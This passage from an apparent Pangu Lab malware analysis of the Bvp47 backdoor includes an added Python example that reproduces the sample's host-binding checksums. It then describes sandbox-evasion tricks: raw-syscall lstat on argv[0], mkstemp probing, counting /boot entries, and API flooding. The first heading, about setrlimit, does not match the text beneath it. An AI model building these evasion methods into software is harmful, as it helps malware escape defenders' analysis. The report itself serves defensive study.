###### 1. Use the setrlimit API to set the core dump file size to 0 to prevent sample extraction
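Two values the sample derives from the host, the Bvp engine's kernel identifier described in the Bvp Engine section (the MD5 of /proc/version) and the runtime-environment checksum just described (statvfs blocks XOR files), computed by an added Python example written for this article; it is not Pangu Lab's code and not taken from the sample. It lets an analyst see what an analysis host produces and why a sample bound to one host fails the check on another. The little-endian reading of the first payload block and the foreign-host numbers are constructed assumptions.

```python
import hashlib
import os
import struct


def kernel_identifier(proc_version: bytes) -> str:
    """Kernel identifier as the Bvp engine derives it: the MD5 of the raw
    contents of /proc/version with no normalisation (per the report)."""
    return hashlib.md5(proc_version).hexdigest()


def host_kernel_identifier(path: str = "/proc/version") -> str:
    """Identifier this host would produce; compare it against the MD5 values
    a sample carries to see whether the engine has an adaptation entry for it."""
    with open(path, "rb") as f:
        return kernel_identifier(f.read())


def env_checksum(blocks: int, files: int) -> int:
    """Runtime-environment check as the report describes it: the statvfs("/")
    block count XOR inode count, kept to 32 bits because the value decrypted
    from the first payload block is a 32-bit unsigned integer."""
    return (blocks ^ files) & 0xFFFFFFFF


def checksum_from_first_block(block: bytes) -> int:
    """Pull the 32-bit value out of a decrypted first payload block.
    Assumption: little-endian byte order; the report does not state it."""
    return struct.unpack("<I", block[:4])[0]


def host_checksum(path: str = "/") -> int:
    """Value this host yields for the same statvfs fields the sample reads."""
    st = os.statvfs(path)
    return env_checksum(st.f_blocks, st.f_files)


def environment_matches(expected: int, path: str = "/") -> bool:
    """True when the sample's check would pass here; a mismatch is the
    condition under which the report says the sample deletes itself."""
    return host_checksum(path) == expected


if __name__ == "__main__":
    try:
        print("kernel identifier (MD5 of /proc/version):", host_kernel_identifier())
    except OSError:
        print("no /proc/version on this host")
    here = host_checksum()
    print(f"statvfs('/') blocks^files on this host: {here:#010x}")
    # Constructed first block bound to this host: the check passes here ...
    bound = struct.pack("<I", here) + bytes(12)
    print("sample bound to this host passes:", environment_matches(checksum_from_first_block(bound)))
    # ... while a block bound to another (constructed) filesystem geometry
    # does not, which is why copying the sample to an analysis box trips it.
    other = env_checksum(0x0123_4567, 0x0007_0000)
    print("sample bound elsewhere passes here:", environment_matches(other))
```

Because the checksum is a XOR of two quantities, an analyst who recovers the value from a sample cannot recover the original host's block and inode counts from it; what the value does give is a quick way to confirm that a sample found on a host was built for that host.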
###### 2. Anti-sandbox technology combined with argv[0] and lstat

Untrusted programs are often run in sandboxes that monitor their behavior. When the program runs there, it often does not actually land on disk, that is, the path pointed to by argv[0] is not the program's real path. The program invokes lstat directly through a syscall, bypassing the sandbox's ring-3 hooks, and checks whether the file pointed to by argv[0] really exists.

###### 3. mkstemp anti-sandbox technology

mkstemp is the API used to generate temporary files in the Linux /tmp directory. (Our assumption: because sandboxes at the time did not support this API, or the sandbox policy disabled mkstemp, the success of the mkstemp call can be used to identify a sandbox.)

###### 4. /boot anti-sandbox technology

In a sandbox there are often only two entries in the /boot directory, /boot/. and /boot/.., so opening /boot and counting its entries can often identify a sandbox. (On Windows, the equivalent check counts the temporary files in the TEMP directory.)

###### 5. API flooding and delayed execution

Any sandbox allocates only a limited amount of time to each sample. Therefore many legitimate APIs are called to delay execution and outlast the sandbox's initial analysis.

#### 7. Summary

As an advanced attack tool, Bvp47 has shown the world its complexity, targeting and forward-looking design. What is shocking is that analysis shows it may have existed for more than ten years. According to information learned through the Shadow Brokers leaks and the NSA ANT catalog, the engineering behind it covers essentially the full *nix platform, and the advanced SYNKnock covert-channel technology it uses may extend to Cisco platforms, Solaris, AIX, SUN and even Windows. What kind of force is driving its development?
It may be possible to get some answers from the multiple victim units, which generally belong to key state departments.

As a cyber-security team that insists on being driven by high-precision technology, Pangu Lab is soberly aware of the powerful attack capabilities of the world's top-class APT groups. We can only protect users in future cyber confrontations by actively exploring cutting-edge information-security attack and defense technology, keeping track of important incidents, and coordinating with cybersecurity professionals globally.

### 8. References

1. The Shadow Brokers: don't forget your base. https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1
2. The Shadow Brokers: x0rz-EQGRP. https://github.com/x0rz/EQGRP/
3. NSA ANT catalog – Wikipedia. https://en.wikipedia.org/wiki/NSA_ANT_catalog
4. FOXACID-Server-SOP-Redacted.pdf. https://edwardsnowden.com/docs/doc/FOXACID-Server-SOP-Redacted.pdf

### About Pangu Lab

Beijing Qi an Pangu Laboratory Technology Co., Ltd. was established on the basis of Pangu Lab, a well-known cyber-security team. It focuses on advanced security research and attack-and-defense research, and has deep research ability and experience in operating systems, virtualization, the Internet of Things and application security.